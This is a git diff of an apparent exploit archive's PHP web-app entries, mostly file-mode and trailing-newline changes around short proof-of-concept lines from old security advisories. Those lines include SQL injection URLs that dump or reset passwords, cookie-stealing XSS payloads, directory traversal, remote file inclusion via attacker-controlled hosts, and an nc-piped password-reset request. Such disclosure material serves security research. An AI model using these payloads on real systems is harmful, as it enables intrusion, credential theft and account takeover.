b/platforms/php/webapps/2316.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23160.txt b/platforms/php/webapps/23160.txt old mode 100755 new mode 100644 index 9561a4ec9..8c2bc5784 --- a/platforms/php/webapps/23160.txt +++ b/platforms/php/webapps/23160.txt @@ -6,4 +6,4 @@ The vulnerabilities have been reported to exists in the banners.php, emailfriend Mambo Open Source Server 4.0.14 has been reported to be prone to this problem, however other versions may be affected as well. -http://localhost/mambo/contact.php?op=sendmail&text=this is spam&from=none&name=Admin&email_to=example@example.com&sitename=www.example.com \ No newline at end of file +http://localhost/mambo/contact.php?op=sendmail&text=this is spam&from=none&name=Admin&email_to=example@example.com&sitename=www.example.com \ No newline at end of file diff --git a/platforms/php/webapps/23163.txt b/platforms/php/webapps/23163.txt old mode 100755 new mode 100644 index fc3bfb56c..059a42902 --- a/platforms/php/webapps/23163.txt +++ b/platforms/php/webapps/23163.txt @@ -12,4 +12,4 @@ http://www.example.com/powerslave,id,10;,nodeid,,_language,uk.html and table-numbers. Error: Could't find article! -SELECT example_table.* FROM example_table WHERE example_table.ID=10; \ No newline at end of file +SELECT example_table.* FROM example_table WHERE example_table.ID=10; \ No newline at end of file diff --git a/platforms/php/webapps/23164.txt b/platforms/php/webapps/23164.txt old mode 100755 new mode 100644 index b1b6801a0..3e4d25c65 --- a/platforms/php/webapps/23164.txt +++ b/platforms/php/webapps/23164.txt @@ -6,4 +6,4 @@ The cause of this problem is due to insufficient sanitization of user-supplied d myPHPNuke version 1.8.8 has been reported to be prone to this issue, however other versions may be affected as well. -select pwd from mpn_authors where aid='mad' into outfile '/filepath/file.txt' \ No newline at end of file +select pwd from mpn_authors where aid='mad' into outfile '/filepath/file.txt' \ No newline at end of file diff --git a/platforms/php/webapps/2317.txt b/platforms/php/webapps/2317.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23175.txt b/platforms/php/webapps/23175.txt old mode 100755 new mode 100644 index 190bdbccd..e07ddc51a --- a/platforms/php/webapps/23175.txt +++ b/platforms/php/webapps/23175.txt @@ -8,4 +8,4 @@ Thread-IT version 1.6 and prior may be vulnerable to this issue. "><script> this code will hide every thing after it including the the board topics if any attacker write it in the topic title. -<script>windows.open("URL");</script> this code will open a new window when the board loaded. \ No newline at end of file +<script>windows.open("URL");</script> this code will open a new window when the board loaded. \ No newline at end of file diff --git a/platforms/php/webapps/2318.txt b/platforms/php/webapps/2318.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23180.txt b/platforms/php/webapps/23180.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2319.txt b/platforms/php/webapps/2319.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23192.txt b/platforms/php/webapps/23192.txt old mode 100755 new mode 100644 index f231fdb9e..51bb27fb0 --- a/platforms/php/webapps/23192.txt +++ b/platforms/php/webapps/23192.txt @@ -4,4 +4,4 @@ It has been reported that one of the scripts included with GuppY is vulnerable t The vendor is aware of the vulnerability and has released an updated version, 2,4p1, that eliminates the issue. -[c=expression(alert('unsecure'))]texte[/c] \ No newline at end of file +[c=expression(alert('unsecure'))]texte[/c] \ No newline at end of file diff --git a/platforms/php/webapps/23193.txt b/platforms/php/webapps/23193.txt old mode 100755 new mode 100644 index 7f8182700..1cba4c04e --- a/platforms/php/webapps/23193.txt +++ b/platforms/php/webapps/23193.txt @@ -21,4 +21,4 @@ CODE] http://www.example.com/comment.php?mode=display&sid=filemgmt-XXX&title=[SQL INJECTION CODE] -http://www.example.com/filemgmt/singlefile.php?lid=17'/0/[SQL INJECTION CODE] \ No newline at end of file +http://www.example.com/filemgmt/singlefile.php?lid=17'/0/[SQL INJECTION CODE] \ No newline at end of file diff --git a/platforms/php/webapps/23194.txt b/platforms/php/webapps/23194.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23205.txt b/platforms/php/webapps/23205.txt old mode 100755 new mode 100644 index b373a37f7..f49883ede --- a/platforms/php/webapps/23205.txt +++ b/platforms/php/webapps/23205.txt @@ -9,4 +9,4 @@ http://www.example.com/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' http://www.example.com/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile'/var/www/html/dcpad.txt -http://www.example.com/dcp/advertiser.php?adv_logged=1&username=1&password=' \ No newline at end of file +http://www.example.com/dcp/advertiser.php?adv_logged=1&username=1&password=' \ No newline at end of file diff --git a/platforms/php/webapps/23206.txt b/platforms/php/webapps/23206.txt old mode 100755 new mode 100644 index abb66de84..87d0cbeaa --- a/platforms/php/webapps/23206.txt +++ b/platforms/php/webapps/23206.txt @@ -4,4 +4,4 @@ Multiple SQL Injection vulnerabilities have been discovered that affect DCP-Port An attacker may exploit these conditions to disclose DCP Portal credentials, reset user passwords, or perform a denial of service type attack via email spamming. -http://www.example.com/dcp/lostpassword.php?action=lost&email=fake' or 1=1--' \ No newline at end of file +http://www.example.com/dcp/lostpassword.php?action=lost&email=fake' or 1=1--' \ No newline at end of file diff --git a/platforms/php/webapps/23207.txt b/platforms/php/webapps/23207.txt old mode 100755 new mode 100644 index a587145dc..74f915328 --- a/platforms/php/webapps/23207.txt +++ b/platforms/php/webapps/23207.txt @@ -6,4 +6,4 @@ Successful exploitation of this vulnerability may allow an attacker to steal coo Atrise Everyfind 5.02 has been listed as a vulnerable package, however other versions may be affected as well. -http://www.example.com/search.html?cat=0&keys=<script>alert("hello")</script><script>alert.document.cookie)</script> \ No newline at end of file +http://www.example.com/search.html?cat=0&keys=<script>alert("hello")</script><script>alert.document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/23208.txt b/platforms/php/webapps/23208.txt old mode 100755 new mode 100644 index 94775905f..608509ff4 --- a/platforms/php/webapps/23208.txt +++ b/platforms/php/webapps/23208.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8744/info It has been reported that MPNews PRO is prone to an information disclosure vulnerability. The problem is believed to occur due to MPNews PRO failing to sufficiently filter specific dot-dot-slash sequences (../). As a result, an attacker may be capable of viewing the contents of files located outside of the established web root. -http://www.example.org/./.././../mpnews.ini \ No newline at end of file +http://www.example.org/./.././../mpnews.ini \ No newline at end of file diff --git a/platforms/php/webapps/2321.php b/platforms/php/webapps/2321.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23213.txt b/platforms/php/webapps/23213.txt old mode 100755 new mode 100644 index 41ca8cf9f..db4a49e24 --- a/platforms/php/webapps/23213.txt +++ b/platforms/php/webapps/23213.txt @@ -4,4 +4,4 @@ Wordpress has been reported prone to multiple SQL injection vulnerabilities. The Ultimately an attacker may exploit this vulnerability to insert SQL code into Wordpress requests and have the SQL code executed by the underlying database server. -http://www.example.com/index.php?cat=100)%09or%090=0%09or%09(0=1 \ No newline at end of file +http://www.example.com/index.php?cat=100)%09or%090=0%09or%09(0=1 \ No newline at end of file diff --git a/platforms/php/webapps/23218.txt b/platforms/php/webapps/23218.txt old mode 100755 new mode 100644 index 22ff5f585..59d8a39cb --- a/platforms/php/webapps/23218.txt +++ b/platforms/php/webapps/23218.txt @@ -8,4 +8,4 @@ http://[attacker]/auth_func.php http://[target]/emml_email_func.php?emml_path=http://[attacker] will include the file : -http://[attacker]/class.html.mime.mail.php \ No newline at end of file +http://[attacker]/class.html.mime.mail.php \ No newline at end of file diff --git a/platforms/php/webapps/23219.txt b/platforms/php/webapps/23219.txt old mode 100755 new mode 100644 index 86159b138..a9d180682 --- a/platforms/php/webapps/23219.txt +++ b/platforms/php/webapps/23219.txt @@ -11,4 +11,4 @@ Successful exploitation of this vulnerability may allow an attacker to steal coo - With a cookie named "GuppYUser" and with the value : fr||[NICK]||[MAIL]||LR||||on||<br style="background:url('javascript:[SCRIPT]')">, if you send a message -(forum, guestbook,...) the javascript is executed. \ No newline at end of file +(forum, guestbook,...) the javascript is executed. \ No newline at end of file diff --git a/platforms/php/webapps/2322.php b/platforms/php/webapps/2322.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23220.txt b/platforms/php/webapps/23220.txt old mode 100755 new mode 100644 index c4b0cea81..66623a35b --- a/platforms/php/webapps/23220.txt +++ b/platforms/php/webapps/23220.txt @@ -17,4 +17,4 @@ will write into http://[target]/tadaam.html the line : fr||../../admin/mdp.php%00||[MAIL]||LR||||on||1 sent to the page : http://[target]/tinymsg.php?action=3 will show the source of the file http://[target]/admin/mdp.php (containing the md5-crypted -admin password). \ No newline at end of file +admin password). \ No newline at end of file diff --git a/platforms/php/webapps/2323.txt b/platforms/php/webapps/2323.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23232.txt b/platforms/php/webapps/23232.txt old mode 100755 new mode 100644 index 135ff3c17..af499dec4 --- a/platforms/php/webapps/23232.txt +++ b/platforms/php/webapps/23232.txt @@ -4,4 +4,4 @@ PayPal Store Front is prone to a remote file include vulnerability. It may be po PayPal Store Front 3.0 has been reported to be vulnerable to this issue, however it is possible that other versions are affected as well. -http://www.example.com/index.php?do=ext&page=http://www.attacker's_site.com/index \ No newline at end of file +http://www.example.com/index.php?do=ext&page=http://www.attacker's_site.com/index \ No newline at end of file diff --git a/platforms/php/webapps/23233.txt b/platforms/php/webapps/23233.txt old mode 100755 new mode 100644 index e518b899f..1a1b3346c --- a/platforms/php/webapps/23233.txt +++ b/platforms/php/webapps/23233.txt @@ -8,4 +8,4 @@ The malicious HTML may be rendered in the browser of an unsuspecting user who vi <img src="javascript:alert()"> -<b style="background-image: url(javascript:alert(document))">test</b> \ No newline at end of file +<b style="background-image: url(javascript:alert(document))">test</b> \ No newline at end of file diff --git a/platforms/php/webapps/23238.txt b/platforms/php/webapps/23238.txt old mode 100755 new mode 100644 index 671aa5cd0..ad7353a64 --- a/platforms/php/webapps/23238.txt +++ b/platforms/php/webapps/23238.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8814/info It has been reported that Gallery is prone to a remote file include vulnerability in the index.php script file. The problem occurs due to the program failing to verify the location in which it includes the util.php script, when handling specific requests to index.php. As a result, an attacker may be capable of having arbitrary PHP script code being executed on the remote host with the privileges of the web server. -http://www.example.org/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://www.attacker.com/ \ No newline at end of file +http://www.example.org/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://www.attacker.com/ \ No newline at end of file diff --git a/platforms/php/webapps/2324.txt b/platforms/php/webapps/2324.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23244.txt b/platforms/php/webapps/23244.txt old mode 100755 new mode 100644 index e3350f0af..30ff429f4 --- a/platforms/php/webapps/23244.txt +++ b/platforms/php/webapps/23244.txt @@ -4,4 +4,4 @@ WrenSoft Zoom Search Engine is prone to a cross-site scripting issue in the soft The problem occurs because the software fails to properly sanitize user-supplied input. An attacker may be able to a construct a malicious link containing HTML or script code that may be rendered in a user's browser upon visiting that link. This attack would occur in the security context of the vulnerable site. -http://www.example.com/search.php?zoom_query=<script>alert("hello")</script><script>alert("hello")</script> \ No newline at end of file +http://www.example.com/search.php?zoom_query=<script>alert("hello")</script><script>alert("hello")</script> \ No newline at end of file diff --git a/platforms/php/webapps/23249.txt b/platforms/php/webapps/23249.txt old mode 100755 new mode 100644 index 129fb97b4..84b47fa63 --- a/platforms/php/webapps/23249.txt +++ b/platforms/php/webapps/23249.txt @@ -26,5 +26,4 @@ http://server/kingchat.php?chat=2&l=2&message= Your persistant XSS will be stored here. -Enjoy ;). VipVince. - \ No newline at end of file +Enjoy ;). VipVince. \ No newline at end of file diff --git a/platforms/php/webapps/2325.txt b/platforms/php/webapps/2325.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23252.txt b/platforms/php/webapps/23252.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23253.txt b/platforms/php/webapps/23253.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23259.txt b/platforms/php/webapps/23259.txt old mode 100755 new mode 100644 index 37ea2f0fe..ca1128726 --- a/platforms/php/webapps/23259.txt +++ b/platforms/php/webapps/23259.txt @@ -6,4 +6,4 @@ vadmin_login = ' OR Login LIKE '% and -vadmin_pass = ' OR Password LIKE '% \ No newline at end of file +vadmin_pass = ' OR Password LIKE '% \ No newline at end of file diff --git a/platforms/php/webapps/2326.txt b/platforms/php/webapps/2326.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23260.sh b/platforms/php/webapps/23260.sh index 414151604..1776e446e 100755 --- a/platforms/php/webapps/23260.sh +++ b/platforms/php/webapps/23260.sh @@ -12,4 +12,4 @@ Content-type: application/x-www-form-urlencoded mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1& " | nc localhost 80 -------------->8------------->8------------->8------------->8-------------- \ No newline at end of file +------------->8------------->8------------->8------------->8-------------- \ No newline at end of file diff --git a/platforms/php/webapps/23261.txt b/platforms/php/webapps/23261.txt old mode 100755 new mode 100644 index a731af094..aa2bf3f40 --- a/platforms/php/webapps/23261.txt +++ b/platforms/php/webapps/23261.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8850/info Bytehoard is prone to directory traversal attacks. This could potentially permit remote attackers to gain unauthorized access to sensitive files hosted on the system running the software. -http://www.example.com/bytehoard/index.php?infolder=../../../../ \ No newline at end of file +http://www.example.com/bytehoard/index.php?infolder=../../../../ \ No newline at end of file diff --git a/platforms/php/webapps/23264.txt b/platforms/php/webapps/23264.txt old mode 100755 new mode 100644 index ed6c03d40..22c2cc1af --- a/platforms/php/webapps/23264.txt +++ b/platforms/php/webapps/23264.txt @@ -6,4 +6,4 @@ DeskPro version 1.1.0 and prior have been reported to be prone to this issue, ho http://www.example.com/deskpro_v1/faq.php?cat=45' http://www.example.com/deskpro_v1/faq.php?article=105' -http://www.example.com/deskpro_v1/view.php?ticketid=1'&ticket_pass= \ No newline at end of file +http://www.example.com/deskpro_v1/view.php?ticketid=1'&ticket_pass= \ No newline at end of file diff --git a/platforms/php/webapps/23269.txt b/platforms/php/webapps/23269.txt old mode 100755 new mode 100644 index c8d2028c0..15d5b5f8d --- a/platforms/php/webapps/23269.txt +++ b/platforms/php/webapps/23269.txt @@ -10,4 +10,4 @@ If the value of $email is aaa@aaa.com' OR 1=1 INTO OUTFILE '/<directory-path>/pass.txt, the SQL request becomes: select passmd5 from people where email=' aaa@aaa.com' OR 1=1 INTO OUTFILE -'/<directory-path>/pass.txt' \ No newline at end of file +'/<directory-path>/pass.txt' \ No newline at end of file diff --git a/platforms/php/webapps/2327.txt b/platforms/php/webapps/2327.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23284.txt b/platforms/php/webapps/23284.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23286.txt b/platforms/php/webapps/23286.txt old mode 100755 new mode 100644 index 99cd4f7b1..a9c402eba --- a/platforms/php/webapps/23286.txt +++ b/platforms/php/webapps/23286.txt @@ -78,6 +78,4 @@ categories, prices and special fees can be translated. _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - - \ No newline at end of file +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/platforms/php/webapps/23287.txt b/platforms/php/webapps/23287.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23289.txt b/platforms/php/webapps/23289.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2329.txt b/platforms/php/webapps/2329.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23294.txt b/platforms/php/webapps/23294.txt old mode 100755 new mode 100644 index fea7aeb73..e6b43d526 --- a/platforms/php/webapps/23294.txt +++ b/platforms/php/webapps/23294.txt @@ -4,4 +4,4 @@ It has been reported that Chi Kien Uong Guestbook may be prone to a cross-site s Successful exploitation of this attack may allow an attacker to steal cookie-based authentication information. -" onmouseover="alert(document.cookie) \ No newline at end of file +" onmouseover="alert(document.cookie) \ No newline at end of file diff --git a/platforms/php/webapps/23302.txt b/platforms/php/webapps/23302.txt old mode 100755 new mode 100644 index 5a43d6bbf..cc9097855 --- a/platforms/php/webapps/23302.txt +++ b/platforms/php/webapps/23302.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8902/info A problem has been reported in the handling of some types of input by Les Visiteurs. Because of this, an attacker may be able to execute arbitrary commands on the system. -http://www.example.com/path/include/config.inc.php?lvc_include_dir=http://backdoor/ \ No newline at end of file +http://www.example.com/path/include/config.inc.php?lvc_include_dir=http://backdoor/ \ No newline at end of file diff --git a/platforms/php/webapps/23313.txt b/platforms/php/webapps/23313.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23319.txt b/platforms/php/webapps/23319.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23322.txt b/platforms/php/webapps/23322.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2333.php b/platforms/php/webapps/2333.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23330.txt b/platforms/php/webapps/23330.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23333.txt b/platforms/php/webapps/23333.txt old mode 100755 new mode 100644 index 88373efa4..2f6c83a8c --- a/platforms/php/webapps/23333.txt +++ b/platforms/php/webapps/23333.txt @@ -4,4 +4,4 @@ PHPKIT is reported to be prone to a cross-site scripting vulnerability. This is An attacker could exploit this issue by enticing a user to follow a malicious link. This could theoretically allow for theft of cookie-based authentication credentials or other attacks. -http://www.example.com/include.php?path=contact.php&contact_email="><script>alert(123);</script> \ No newline at end of file +http://www.example.com/include.php?path=contact.php&contact_email="><script>alert(123);</script> \ No newline at end of file diff --git a/platforms/php/webapps/23336.txt b/platforms/php/webapps/23336.txt old mode 100755 new mode 100644 index 4af641a15..7909eb375 --- a/platforms/php/webapps/23336.txt +++ b/platforms/php/webapps/23336.txt @@ -7,4 +7,4 @@ Successful exploitation of this attack may allow an attacker to steal cookie-bas OpenAutoClassifieds version 1.0 is reported to be prone to this issue, however other versions may be affected as well. http://www.example.com/openautoclassifieds/friendmail.php?listing=< -script>alert(document.domain);</script> \ No newline at end of file +script>alert(document.domain);</script> \ No newline at end of file diff --git a/platforms/php/webapps/23338.txt b/platforms/php/webapps/23338.txt old mode 100755 new mode 100644 index e6137bbc9..d1c71d794 --- a/platforms/php/webapps/23338.txt +++ b/platforms/php/webapps/23338.txt @@ -7,4 +7,4 @@ Successful exploitation of this vulnerability may allow an attacker to steal coo Easy PHP Photo Album version 1.0 has been reported to be vulnerable to this issue, however prior versions may be affected as well. http://www.example.com/photos/showimages.php?dir=<iframe%20src="C:\"%20width=400%20height=400></iframe> -http://www.example.com//photos/showfullimage.php?dir=[dir name][spc]St[spc]Clair&image=<h1>hello</h1> \ No newline at end of file +http://www.example.com//photos/showfullimage.php?dir=[dir name][spc]St[spc]Clair&image=<h1>hello</h1> \ No newline at end of file diff --git a/platforms/php/webapps/2335.txt b/platforms/php/webapps/2335.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23353.txt b/platforms/php/webapps/23353.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23354.txt b/platforms/php/webapps/23354.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23355.txt b/platforms/php/webapps/23355.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23356.txt b/platforms/php/webapps/23356.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23359.txt b/platforms/php/webapps/23359.txt old mode 100755 new mode 100644 index 32ef0ef56..2bccd5964 --- a/platforms/php/webapps/23359.txt +++ b/platforms/php/webapps/23359.txt @@ -43,4 +43,4 @@ SQL Error: +------------------------------------------------------------------+ -Enjoy. \ No newline at end of file +Enjoy. \ No newline at end of file diff --git a/platforms/php/webapps/23363.txt b/platforms/php/webapps/23363.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2337.txt b/platforms/php/webapps/2337.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23372.txt b/platforms/php/webapps/23372.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23381.txt b/platforms/php/webapps/23381.txt old mode 100755 new mode 100644 index 3a71d8b88..18a9f11ed --- a/platforms/php/webapps/23381.txt +++ b/platforms/php/webapps/23381.txt @@ -4,4 +4,4 @@ It has been reported that phpWebFileManager may be prone to a directory traversa phpWebFileManager version 2.0.0 is reported to be prone to this issue, however other versions may be affected as well. -http://www.example.com/phpwebfilemgr/index.php?f=../../../ \ No newline at end of file +http://www.example.com/phpwebfilemgr/index.php?f=../../../ \ No newline at end of file diff --git a/platforms/php/webapps/23382.txt b/platforms/php/webapps/23382.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23384.txt b/platforms/php/webapps/23384.txt old mode 100755 new mode 100644 index 5e5603e86..651785913 --- a/platforms/php/webapps/23384.txt +++ b/platforms/php/webapps/23384.txt @@ -4,4 +4,4 @@ It has been reported that Rolis Guestbook may be vulnerable to an input validati Rolis Guestbook version 1.0 has been reported to be prone to this issue, however other versions may be affected as well. -http://www.example.com/rolis_book_path/insert.inc.php?path=http://hacker.com/ \ No newline at end of file +http://www.example.com/rolis_book_path/insert.inc.php?path=http://hacker.com/ \ No newline at end of file diff --git a/platforms/php/webapps/23386.txt b/platforms/php/webapps/23386.txt old mode 100755 new mode 100644 index 8b5f921d0..ead679659 --- a/platforms/php/webapps/23386.txt +++ b/platforms/php/webapps/23386.txt @@ -5,4 +5,4 @@ It has been reported that Auto Directory Index is prone to a cross-site scriptin Auto Directory Index version 1.2.3 is reported to be prone to this issue, however other versions may be affected as well. -http://www.example.com/index.php?dir=<script>malicious_code</script> \ No newline at end of file +http://www.example.com/index.php?dir=<script>malicious_code</script> \ No newline at end of file diff --git a/platforms/php/webapps/2339.txt b/platforms/php/webapps/2339.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2340.txt b/platforms/php/webapps/2340.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23406.txt b/platforms/php/webapps/23406.txt old mode 100755 new mode 100644 index a05eda763..af9dc552c --- a/platforms/php/webapps/23406.txt +++ b/platforms/php/webapps/23406.txt @@ -4,4 +4,4 @@ An information disclosure weakness has been reported in CuteNews 1.3, that may e A malicious person could potentially use information harvested through the exploitation this type of issue to launch future attacks against a target system. -http://www.example.com/cutenews/index.php?debug \ No newline at end of file +http://www.example.com/cutenews/index.php?debug \ No newline at end of file diff --git a/platforms/php/webapps/2341.txt b/platforms/php/webapps/2341.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23416.txt b/platforms/php/webapps/23416.txt old mode 100755 new mode 100644 index 9d330069c..e3dd73bde --- a/platforms/php/webapps/23416.txt +++ b/platforms/php/webapps/23416.txt @@ -6,4 +6,4 @@ http://www.example.com/banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20' /* http://www.example.com/banners.php?op=Change&cid=-1&bid=100&url=HTTP://WWW.NEWURL.C -OM \ No newline at end of file +OM \ No newline at end of file diff --git a/platforms/php/webapps/2342.txt b/platforms/php/webapps/2342.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23420.txt b/platforms/php/webapps/23420.txt old mode 100755 new mode 100644 index 4bad47055..2865cb67d --- a/platforms/php/webapps/23420.txt +++ b/platforms/php/webapps/23420.txt @@ -4,4 +4,4 @@ Bitfolge Snif is prone to a cross-site scripting vulnerability. As a result, hos This issue was reported in version 1.2.6. Other versions are also likely affected. -http://www.example.com/index.php?path=<script>alert(document.domain)</script> \ No newline at end of file +http://www.example.com/index.php?path=<script>alert(document.domain)</script> \ No newline at end of file diff --git a/platforms/php/webapps/23425.txt b/platforms/php/webapps/23425.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23428.html b/platforms/php/webapps/23428.html old mode 100755 new mode 100644 index d090b7af1..a68b4be4c --- a/platforms/php/webapps/23428.html +++ b/platforms/php/webapps/23428.html @@ -19,4 +19,4 @@ ID : <input type="text" name="id" value="1"><br> <input type="submit" name="submit" value="Update"><br> </form> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/php/webapps/23429.txt b/platforms/php/webapps/23429.txt old mode 100755 new mode 100644 index b8b2d2add..6b42cbacd --- a/platforms/php/webapps/23429.txt +++ b/platforms/php/webapps/23429.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9196/info It has bee reported that Mambo Open Source 4.0.14 Server is prone to SQL injection attacks. The problem is said to occur due to insufficient sanitization of data passed to specific index.php variables. As a result, an attacker may be capable of influencing the logic of specific queries or statements made by the underlying database. This could ultimately result in a number of attacks being carried out against the system. -http://www.example.com/index.php?option=articles&task=viewarticle&artid=5%20UNION%20somequery \ No newline at end of file +http://www.example.com/index.php?option=articles&task=viewarticle&artid=5%20UNION%20somequery \ No newline at end of file diff --git a/platforms/php/webapps/2343.txt b/platforms/php/webapps/2343.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23430.txt b/platforms/php/webapps/23430.txt old mode 100755 new mode 100644 index e55db6a51..43f0a8eca --- a/platforms/php/webapps/23430.txt +++ b/platforms/php/webapps/23430.txt @@ -16,4 +16,4 @@ voteID=1&dbprefix=mos_users%20SET%20usertype=char(115,117, # The password of the user having id 10 becomes 'a' : http://www.example.com/pollBooth.php?task=Vote&lang=eng&sessioncookie=1& voteID=1&dbprefix=mos_users%20SET%20password=md5(char(97)) -%20WHERE%20id=10/* \ No newline at end of file +%20WHERE%20id=10/* \ No newline at end of file diff --git a/platforms/php/webapps/2344.txt b/platforms/php/webapps/2344.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23443.txt b/platforms/php/webapps/23443.txt old mode 100755 new mode 100644 index a81cadfbd..1372b9c14 --- a/platforms/php/webapps/23443.txt +++ b/platforms/php/webapps/23443.txt @@ -6,4 +6,4 @@ Aardvark Topsites PHP version 4.1.0 has been reported to be prone to these issue http://www.example.com/index.php?method=` http://www.example.com/index.php?a=lostpw&set=1&id=` -http://www.example.com/index.php?a=lostpw&set=1&session_id=` \ No newline at end of file +http://www.example.com/index.php?a=lostpw&set=1&session_id=` \ No newline at end of file diff --git a/platforms/php/webapps/23445.txt b/platforms/php/webapps/23445.txt old mode 100755 new mode 100644 index 96ab447c6..8ee3cce0e --- a/platforms/php/webapps/23445.txt +++ b/platforms/php/webapps/23445.txt @@ -6,4 +6,4 @@ Successful exploitation of this attack may allow an attacker to steal cookie-bas Although unconfirmed, osCommerce versions 2.2 Milestone 1 and 2.2 Milestone 2 may be vulnerable to this issue. -https://www.example.com/?osCsid="><iframe src=http://www.example.com></iframe> \ No newline at end of file +https://www.example.com/?osCsid="><iframe src=http://www.example.com></iframe> \ No newline at end of file diff --git a/platforms/php/webapps/23448.php b/platforms/php/webapps/23448.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23453.txt b/platforms/php/webapps/23453.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23454.txt b/platforms/php/webapps/23454.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23455.txt b/platforms/php/webapps/23455.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23456.txt b/platforms/php/webapps/23456.txt old mode 100755 new mode 100644 index 965c61a96..1f2677581 --- a/platforms/php/webapps/23456.txt +++ b/platforms/php/webapps/23456.txt @@ -4,4 +4,4 @@ It has been reported that BES-CMS is vulnerable to a remote file include vulnera BES-CMS versions 0.4 rc3 and 0.5 rc3 are reported to be vulnerable to this issue, however other versions may be affected as well. -http://www.example.com/Include/Start.php?inc_path=http://www.example/ \ No newline at end of file +http://www.example.com/Include/Start.php?inc_path=http://www.example/ \ No newline at end of file diff --git a/platforms/php/webapps/23457.txt b/platforms/php/webapps/23457.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23458.txt b/platforms/php/webapps/23458.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23459.txt b/platforms/php/webapps/23459.txt old mode 100755 new mode 100644 index 228aeeb83..c354f558a --- a/platforms/php/webapps/23459.txt +++ b/platforms/php/webapps/23459.txt @@ -6,4 +6,4 @@ This issue was reported in Xoops 2.0.5.1. It is likely that other versions are a http://www.example.com/modules/mylinks/myheader.php?url=javascript:alert(document.cookie); -http://www.example.com/modules/mylinks/myheader.php?url="><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/modules/mylinks/myheader.php?url="><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/2346.txt b/platforms/php/webapps/2346.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23462.txt b/platforms/php/webapps/23462.txt old mode 100755 new mode 100644 index a00c5dab5..6c89252d2 --- a/platforms/php/webapps/23462.txt +++ b/platforms/php/webapps/23462.txt @@ -8,4 +8,4 @@ http://www.example.com/default.php?cPath=[MID]&sort=5a&page=1&action=buy_now&pro [MID] = A Valid Manufacturer ID Number [PID] = A Valid Product ID Number -[JNK] = SQL query or junk. %22 %5C %27 or %00 Will cause a DoS \ No newline at end of file +[JNK] = SQL query or junk. %22 %5C %27 or %00 Will cause a DoS \ No newline at end of file diff --git a/platforms/php/webapps/23463.txt b/platforms/php/webapps/23463.txt old mode 100755 new mode 100644 index 0eb6c3697..5c2c3668e --- a/platforms/php/webapps/23463.txt +++ b/platforms/php/webapps/23463.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9277/info A vulnerability has been reported to exist in the software that may allow a remote user to launch cross-site scripting attacks. The problem is reported to exist due to improper sanitizing of user-supplied data in certain URI parameters passed to the default.php script. This vulnerability makes it possible for an attacker to construct a malicious link containing HTML or script code that may be rendered in a user's browser upon visiting that link. This attack would occur in the security context of the site. -http://www.example.com/default.php?manufacturers_id="><iframe src=http://www.gulftech.org> \ No newline at end of file 